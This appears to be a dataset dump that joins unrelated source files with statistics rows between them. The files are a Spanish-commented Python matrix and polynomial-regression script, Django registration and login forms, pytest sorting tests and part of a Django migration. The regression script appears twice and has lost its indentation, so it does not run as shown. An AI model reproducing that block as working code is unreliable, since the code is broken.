A = createMatrix(m,n)
for i in range(m):
for j in range(n):
A[i][j]=B[i][j]
return A
def sumMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error, matrix of diferent size")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] + B[i][j]
return C
def restaMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error, matrix of diferent size")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] - B[i][j]
return C
def multMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (An != Bm):
print("Error multiplicacion # columnas y # renglos no son iguales")
return []
C = createMatrix(Am,Bn)
counter = 0
for i in range(Am):
for j in range(Bn):
for k in range(An):
C[i][j] += A[i][k] * B[k][j]
return C
def getAdyacente(A,r,c):
Am, An = getDimensions(A)
C = createMatrix(Am-1, An-1, 0)
for i in range(Am):
if (i == r):
continue
for j in range(An):
if (j == c):
continue
ci = 0
cj = 0
if (i < r):
ci = i
else:
ci = i-1
if (j < c):
cj = j
else:
cj = j-1
C[ci][cj] = A[i][j]
return C
def detMatrix(A):
m,n = getDimensions(A)
if m!=n:
print("Matriz no es cuadrada")
return []
if (n==1):
return A[0][0]
if (n==2):
return (A[0][0]*A[1][1]) - (A[1][0]*A[0][1])
det = 0
for j in range(m):
det += (-1)**j*A[0][j]*detMatrix(getAdyacente(A,0,j))
return det
def getMatrizTranspuesta(A):
m,n = getDimensions(A)
C = createMatrix(n,m,0)
for i in range(m):
for j in range(n):
C[j][i] = A[i][j]
return C
def getMatrizAdjunta(A):
m,n = getDimensions(A)
if m != n:
print("La matriz no es cuadrada")
return []
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j] = ((-1)**(i+j))*detMatrix(getAdyacente(A,i,j))
return C
def getMatrizInversa(A):
m,n = getDimensions(A)
if m != n:
print("La matriz no es cuadrada")
return []
detA = detMatrix(A)
if detA== 0:
print("La matriz no tiene inversa")
return []
At = getMatrizTranspuesta(A)
adjA = getMatrizAdjunta(At)
invDetA = 1/detA
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j]=invDetA*adjA[i][j]
return C
def regPolinomial(grado, x, y):
grado += 1
A = createMatrix(grado,grado)
for i in range(grado):
for j in range(grado):
A[i][j] = sum( xi**(i+j) for xi in x)
C = createMatrix(grado,1)
for i in range(grado):
C[i][0] = sum((xi**i)*yi for xi,yi in zip(x,y))
invA = getMatrizInversa(A)
return multMatrix(invA,C)
def evalPolinomio(coef,x):
y = []
coef = np.asarray(coef)
for i in range(len(x)):
y.append(0)
for c in range(len(coef)):
y[i] += (x[i]**c) * coef[c]
return y
x = [8, 16, 24, 32] #gradoMAX X-1
y = [4.1, 4.5, 5.1, 6.1]
plt.plot(x,y,'rx')
#plt.show()
coef = regPolinomial(3, x, y) #aqui se cambia para el grado de la funcion a buscar
print(coef)
x2 = np.linspace(5,35,100)
y2 = evalPolinomio(coef,x2)
plt.plot(x2,y2)
plt.show()
yesp = evalPolinomio(coef,[7])
print("peso esperado 7 semanas --> ", yesp[0][0])
#-------------------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------------------
#-------------------------------------------------------------------------------------------------------------------
# Regresion polinomial
import matplotlib.pyplot as plt
import numpy as np
def createMatrix(m,n, valor=0):
C = []
for i in range(m):
C.append([]) #could be c.append([valor]*n)
for j in range(n):
C[i].append(valor)
return C
def getDimensions(A):
return (len(A),len(A[0]))
def copyMatrix(B):
m,n = getDimensions(B)
A = createMatrix(m,n)
for i in range(m):
for j in range(n):
A[i][j]=B[i][j]
return A
def sumMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error, matrix of diferent size")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] + B[i][j]
return C
def restaMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (Am != Bm or An != Bn):
print("Error, matrix of diferent size")
return []
C = createMatrix(Am,An)
for i in range(Am):
for j in range(An):
C[i][j] = A[i][j] - B[i][j]
return C
def multMatrix(A,B):
Am, An = getDimensions(A)
Bm, Bn = getDimensions(B)
if (An != Bm):
print("Error multiplicacion # columnas y # renglos no son iguales")
return []
C = createMatrix(Am,Bn)
counter = 0
for i in range(Am):
for j in range(Bn):
for k in range(An):
C[i][j] += A[i][k] * B[k][j]
return C
def getAdyacente(A,r,c):
Am, An = getDimensions(A)
C = createMatrix(Am-1, An-1, 0)
for i in range(Am):
if (i == r):
continue
for j in range(An):
if (j == c):
continue
ci = 0
cj = 0
if (i < r):
ci = i
else:
ci = i-1
if (j < c):
cj = j
else:
cj = j-1
C[ci][cj] = A[i][j]
return C
def detMatrix(A):
m,n = getDimensions(A)
if m!=n:
print("Matriz no es cuadrada")
return []
if (n==1):
return A[0][0]
if (n==2):
return (A[0][0]*A[1][1]) - (A[1][0]*A[0][1])
det = 0
for j in range(m):
det += (-1)**j*A[0][j]*detMatrix(getAdyacente(A,0,j))
return det
def getMatrizTranspuesta(A):
m,n = getDimensions(A)
C = createMatrix(n,m,0)
for i in range(m):
for j in range(n):
C[j][i] = A[i][j]
return C
def getMatrizAdjunta(A):
m,n = getDimensions(A)
if m != n:
print("La matriz no es cuadrada")
return []
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j] = ((-1)**(i+j))*detMatrix(getAdyacente(A,i,j))
return C
def getMatrizInversa(A):
m,n = getDimensions(A)
if m != n:
print("La matriz no es cuadrada")
return []
detA = detMatrix(A)
if detA== 0:
print("La matriz no tiene inversa")
return []
At = getMatrizTranspuesta(A)
adjA = getMatrizAdjunta(At)
invDetA = 1/detA
C = createMatrix(m,n,0)
for i in range(m):
for j in range(n):
C[i][j]=invDetA*adjA[i][j]
return C
def regPolinomial(grado, x, y):
grado += 1
A = createMatrix(grado,grado)
for i in range(grado):
for j in range(grado):
A[i][j] = sum( xi**(i+j) for xi in x)
C = createMatrix(grado,1)
for i in range(grado):
C[i][0] = sum((xi**i)*yi for xi,yi in zip(x,y))
invA = getMatrizInversa(A)
return multMatrix(invA,C)
def evalPolinomio(coef,x):
y = []
coef = np.asarray(coef)
for i in range(len(x)):
y.append(0)
for c in range(len(coef)):
y[i] += (x[i]**c) * coef[c]
return y
x = [1, 2, 3, 4, 5] #gradoMAX X-1
y = [88, 87, 84, 82, 79]
plt.plot(x,y,'rx')
#plt.show()
coef = regPolinomial(2, x, y) #aqui se cambia para el grado de la funcion a buscar
print(coef)
x2 = np.linspace(0,8,100)
y2 = evalPolinomio(coef,x2)
plt.plot(x2,y2)
plt.show()
yesp = evalPolinomio(coef,[7])
print("peso esperado 7 semanas --> ", yesp[0][0])
| 24.874286 | 116 | 0.48323 | 1,324 | 8,706 | 3.177492 | 0.0929 | 0.083195 | 0.034229 | 0.062753 | 0.985976 | 0.985976 | 0.985976 | 0.985976 | 0.985976 | 0.969337 | 0 | 0.022979 | 0.325178 | 8,706 | 349 | 117 | 24.945559 | 0.693106 | 0.06754 | 0 | 0.97351 | 0 | 0 | 0.05997 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.086093 | false | 0 | 0.013245 | 0.006623 | 0.245033 | 0.059603 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2acecf14a35f21b92f172ffdd413841efaae277d | 4,023 | py | Python | user/forms.py | qq20004604/Mail-Report-System | 59d2390431251d8ffd0435cab510a37900f2dc17 | [
"Apache-2.0"
] | 1 | 2020-07-29T08:54:46.000Z | 2020-07-29T08:54:46.000Z | user/forms.py | qq20004604/Mail-Report-System | 59d2390431251d8ffd0435cab510a37900f2dc17 | [
"Apache-2.0"
] | 6 | 2021-03-19T10:24:43.000Z | 2021-09-22T19:30:43.000Z | user/forms.py | qq20004604/Mail-Report-System | 59d2390431251d8ffd0435cab510a37900f2dc17 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from package.form import Form, forms
# 发送注册验证码
class SendRegCodeForm(Form):
username = forms.CharField(label='username',
min_length=2,
max_length=20,
required=True,
error_messages={
'required': '你没有填写【用户名】',
'max_length': '【用户名】长度需要在2~20位之间',
'min_length': '【用户名】长度需要在2~20位之间'
}
)
email = forms.EmailField(label='email',
min_length=6,
max_length=80,
required=True,
error_messages={
'required': '你没有填写【邮箱地址】',
'max_length': '【邮箱地址】长度需要在6~80位之间',
'min_length': '【邮箱地址】长度需要在6~80位之间'
})
# 注册
class RegisterForm(Form):
username = forms.CharField(label='username',
min_length=2,
max_length=20,
required=True,
error_messages={
'required': '你没有填写【用户名】',
'max_length': '【用户名】长度需要在2~20位之间',
'min_length': '【用户名】长度需要在2~20位之间'
}
)
password = forms.CharField(label='password',
min_length=8,
max_length=40,
required=True,
error_messages={
'required': '你没有填写【密码】',
'max_length': '【密码】长度需要在8~40位之间',
'min_length': '【密码】长度需要在8~40位之间'
}
)
email = forms.EmailField(label='email',
min_length=6,
max_length=80,
required=True,
error_messages={
'required': '你没有填写【邮箱地址】',
'max_length': '【邮箱地址】长度需要在6~80位之间',
'min_length': '【邮箱地址】长度需要在6~80位之间'
})
regcode = forms.CharField(label='regcode',
min_length=6,
max_length=6,
required=True,
error_messages={
'required': '你没有填写【验证码】',
'max_length': '【验证码】格式错误',
'min_length': '【验证码】格式错误'
})
# 登录
class LoginForm(Form):
username = forms.CharField(label='username',
min_length=2,
max_length=20,
required=True,
error_messages={
'required': '你没有填写【用户名】',
'max_length': '【用户名】长度需要在2~20位之间',
'min_length': '【用户名】长度需要在2~20位之间'
}
)
password = forms.CharField(label='password',
min_length=8,
max_length=40,
required=True,
error_messages={
'required': '你没有填写【密码】',
'max_length': '【密码】长度需要在8~40位之间',
'min_length': '【密码】长度需要在8~40位之间'
}
)
| 43.258065 | 69 | 0.319911 | 247 | 4,023 | 5.048583 | 0.202429 | 0.115477 | 0.109062 | 0.160385 | 0.85004 | 0.834804 | 0.80433 | 0.80433 | 0.80433 | 0.80433 | 0 | 0.040631 | 0.590107 | 4,023 | 92 | 70 | 43.728261 | 0.715585 | 0.014169 | 0 | 0.765432 | 0 | 0 | 0.155769 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.024691 | 0.012346 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
2ad6d40554630a679cf6594b7a4eac65c422f9fd | 2,372 | py | Python | tests/rest_framework_filterdsl_tests/test_sort.py | Awingu/rest_framework_filterdsl | b14c0e95063843f8c08d773531081625a78cb64c | [
"Apache-2.0"
] | 26 | 2017-10-26T18:39:58.000Z | 2021-06-02T07:45:44.000Z | tests/rest_framework_filterdsl_tests/test_sort.py | Awingu/rest_framework_filterdsl | b14c0e95063843f8c08d773531081625a78cb64c | [
"Apache-2.0"
] | 1 | 2019-03-11T12:51:51.000Z | 2019-03-15T15:18:07.000Z | tests/rest_framework_filterdsl_tests/test_sort.py | Awingu/rest_framework_filterdsl | b14c0e95063843f8c08d773531081625a78cb64c | [
"Apache-2.0"
] | 3 | 2017-10-11T08:58:07.000Z | 2020-03-17T13:44:20.000Z | # encoding: utf8
from .testfixtures import animal_get, animal_data
import pytest
@pytest.mark.django_db
def test_sort_by_name_no_direction(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'dog'
assert response.data[1]['name'] == 'duck'
assert response.data[2]['name'] == 'tortoise'
@pytest.mark.django_db
def test_sort_by_name_direction_plus(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "+name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'dog'
assert response.data[1]['name'] == 'duck'
assert response.data[2]['name'] == 'tortoise'
@pytest.mark.django_db
def test_sort_by_name_direction_minus(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "-name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'tortoise'
assert response.data[1]['name'] == 'duck'
assert response.data[2]['name'] == 'dog'
@pytest.mark.django_db
def test_sort_by_multicolumn(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "-legs, name"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'dog'
assert response.data[1]['name'] == 'tortoise'
assert response.data[2]['name'] == 'duck'
@pytest.mark.django_db
def test_sort_by_pk_direction_minus(animal_get, animal_data):
animal_data()
response = animal_get({
'sort': "-id"
})
assert response.status_code == 200
assert len(response.data) == 3
assert response.data[0]['name'] == 'duck'
assert response.data[1]['name'] == 'tortoise'
assert response.data[2]['name'] == 'dog'
@pytest.mark.django_db
def test_sort_and_filter(animal_get, animal_data):
animal_data()
response = animal_get({
'filter': "name startswith 'd'",
'sort': "-id"
})
assert response.status_code == 200
assert len(response.data) == 2
assert response.data[0]['name'] == 'duck'
assert response.data[1]['name'] == 'dog'
| 30.410256 | 63 | 0.637015 | 306 | 2,372 | 4.728758 | 0.137255 | 0.222529 | 0.211472 | 0.091914 | 0.906704 | 0.901175 | 0.901175 | 0.901175 | 0.878369 | 0.822391 | 0 | 0.022364 | 0.208263 | 2,372 | 77 | 64 | 30.805195 | 0.748136 | 0.005902 | 0 | 0.75 | 0 | 0 | 0.097623 | 0 | 0 | 0 | 0 | 0 | 0.426471 | 1 | 0.088235 | false | 0 | 0.029412 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
2adaaeec14fc35bd612dea156ad181f182e370ba | 39,147 | py | Python | operations/propfac/migrations/0001_initial.py | kaizer88/emps | 2669b32c46befcf1a19390fb25013817e6b00980 | [
"MIT"
] | null | null | null | operations/propfac/migrations/0001_initial.py | kaizer88/emps | 2669b32c46befcf1a19390fb25013817e6b00980 | [
"MIT"
] | null | null | null | operations/propfac/migrations/0001_initial.py | kaizer88/emps | 2669b32c46befcf1a19390fb25013817e6b00980 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('employees', '0001_initial'),
('offices', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='HistoricalLeaseAgreement',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('office_space', models.CharField(default=None, max_length=200, null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety', models.BooleanField(default=False)),
('deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('surety_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity_deposit', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('electricity', models.CharField(default=None, max_length=200, null=True, blank=True, choices=[(b'Eskom', b'Eskom'), (b'Pre-Paid', b'Pre-Paid'), (b'PEC', b'PEC Metering'), (b'Municipal', b'Municipal')])),
('current_leasee', models.CharField(default=None, max_length=200, null=True, blank=True)),
('leasor', models.CharField(default=b'Pending', max_length=200, null=True, blank=True)),
('lease_expiry_date', models.DateField(null=True, blank=True)),
('notice_term', models.CharField(default=None, max_length=200, null=True, blank=True)),
('contact_person', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=b'Operational', max_length=20, null=True, blank=True, choices=[(b'Operational', b'Operational'), (b'Pending Closure', b'Pending Closure'), (b'Closed', b'Closed')])),
('exit_clause_sent', models.BooleanField(default=False)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical lease agreement',
},
),
migrations.CreateModel(
name='HistoricalLeaseAgreementRenewal',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('expiry_date', models.DateField(null=True, blank=True)),
('renewal_date', models.DateField(null=True, blank=True)),
('rental_amount', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('new_expiry_date', models.DateField(null=True, blank=True)),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical lease agreement renewal',
},
),
migrations.CreateModel(
name='HistoricalOfficeInspection',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('blinds', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_handles', models.BooleanField(default=False)),
('air_conditioner', models.BooleanField(default=False)),
('furniture', models.BooleanField(default=False)),
('fire_extinguisher', models.BooleanField(default=False)),
('white_board', models.BooleanField(default=False)),
('overhead_projector', models.BooleanField(default=False)),
('appliances', models.BooleanField(default=False)),
('shelving', models.BooleanField(default=False)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('floor', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Floor', null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('inspector', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='employees.Employee', null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('section', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Section', null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical office inspection',
},
),
migrations.CreateModel(
name='HistoricalPFComment',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('comments', models.CharField(default=None, max_length=2000)),
('commented', models.DateTimeField(editable=False, blank=True)),
('comment_type', models.CharField(default=None, max_length=120, null=True, blank=True)),
('obj_id', models.IntegerField(null=True, blank=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf comment',
},
),
migrations.CreateModel(
name='HistoricalPFDocument',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('file_name', models.CharField(max_length=255, blank=True)),
('file', models.TextField(max_length=100)),
('obj_id', models.CharField(default=None, max_length=20, null=True, blank=True)),
('obj_type', models.CharField(default=None, max_length=50, null=True, blank=True)),
('date_uploaded', models.DateTimeField(editable=False, blank=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf document',
},
),
migrations.CreateModel(
name='HistoricalPFRequisition',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('quote_number', models.CharField(default=None, max_length=120)),
('obj_id', models.IntegerField(null=True, blank=True)),
('requisition_type', models.CharField(default=None, max_length=120)),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('requested', models.DateTimeField(editable=False, blank=True)),
('supplier', models.CharField(default=None, max_length=120)),
('vat_included', models.BooleanField(default=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('requested_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='employees.Employee', null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf requisition',
},
),
migrations.CreateModel(
name='HistoricalPFRequisitionItem',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('item_code', models.CharField(default=None, max_length=200, null=True, blank=True)),
('line_item', models.CharField(default=None, max_length=200, null=True, blank=True)),
('qty', models.IntegerField(null=True, blank=True)),
('unit_price', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('line_total', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical pf requisition item',
},
),
migrations.CreateModel(
name='HistoricalPropertyMaintenance',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('maint_date', models.DateField(null=True, blank=True)),
('maintenance_type', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'General', b'General'), (b'Air Conditioning', b'Air Conditioning'), (b'Electrical', b'Elecriical'), (b'Floor Capets and Tiling', b'Floor Capets and Tiling'), (b'Plumbing', b'Plumbing'), (b'Security', b'Security'), (b'Walls And Partitioning', b'Walls And Partitioning')])),
('description', models.CharField(default=None, max_length=2000, null=True, blank=True)),
('projected_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('actual_cost', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('difference', models.FloatField(default=0, max_length=20, null=True, blank=True)),
('invoice_number', models.CharField(default=None, max_length=200, null=True, blank=True)),
('service_provider', models.CharField(default=None, max_length=200, null=True, blank=True)),
('status', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'Good Condition', b'Good Condition'), (b'Minor Damages', b'Minor Damages'), (b'Major Damages', b'Major Damages'), (b'Write Off', b'Write Off')])),
('accept', models.BooleanField(default=False)),
('authorize', models.CharField(default=b'Pending', max_length=20, null=True, blank=True, choices=[(b'Pending', b'Pending'), (b'Aproved', b'Authorize'), (b'Declined', b'Decline')])),
('history_id', models.AutoField(serialize=False, primary_key=True)),
('history_date', models.DateTimeField()),
('history_type', models.CharField(max_length=1, choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')])),
('branch', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to='offices.Branch', null=True)),
('created_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
('history_user', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL, null=True)),
('modified_by', models.ForeignKey(related_name='+', on_delete=django.db.models.deletion.DO_NOTHING, db_constraint=False, blank=True, to=settings.AUTH_USER_MODEL, null=True)),
],
options={
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
'verbose_name': 'historical property maintenance',
},
),
migrations.CreateModel(
name='HistoricalToiletInspection',
fields=[
('id', models.IntegerField(verbose_name='ID', db_index=True, auto_created=True, blank=True)),
('toilet', models.CharField(default=None, max_length=20, null=True, blank=True, choices=[(b'gents', b'Gents'), (b'ladies', b'Ladies')])),
('date_checked', models.DateField(null=True, blank=True)),
('time_checked', models.TimeField(null=True, blank=True)),
('walls_and_covering', models.BooleanField(default=False)),
('windows_and_handles', models.BooleanField(default=False)),
('ceiling', models.BooleanField(default=False)),
('lights_and_switches', models.BooleanField(default=False)),
('doors_and_hanles', models.BooleanField(default=False)),
('air_extractor', models.BooleanField(default=False)),
('seat_and_cover', models.BooleanField(default=False)),
('urinary', models.BooleanField(default=False)),
('water_dispenser', models.BooleanField(default=False)),
('washing_basin', models.BooleanField(default=False)),
('taps', models.BooleanField(default=False)),
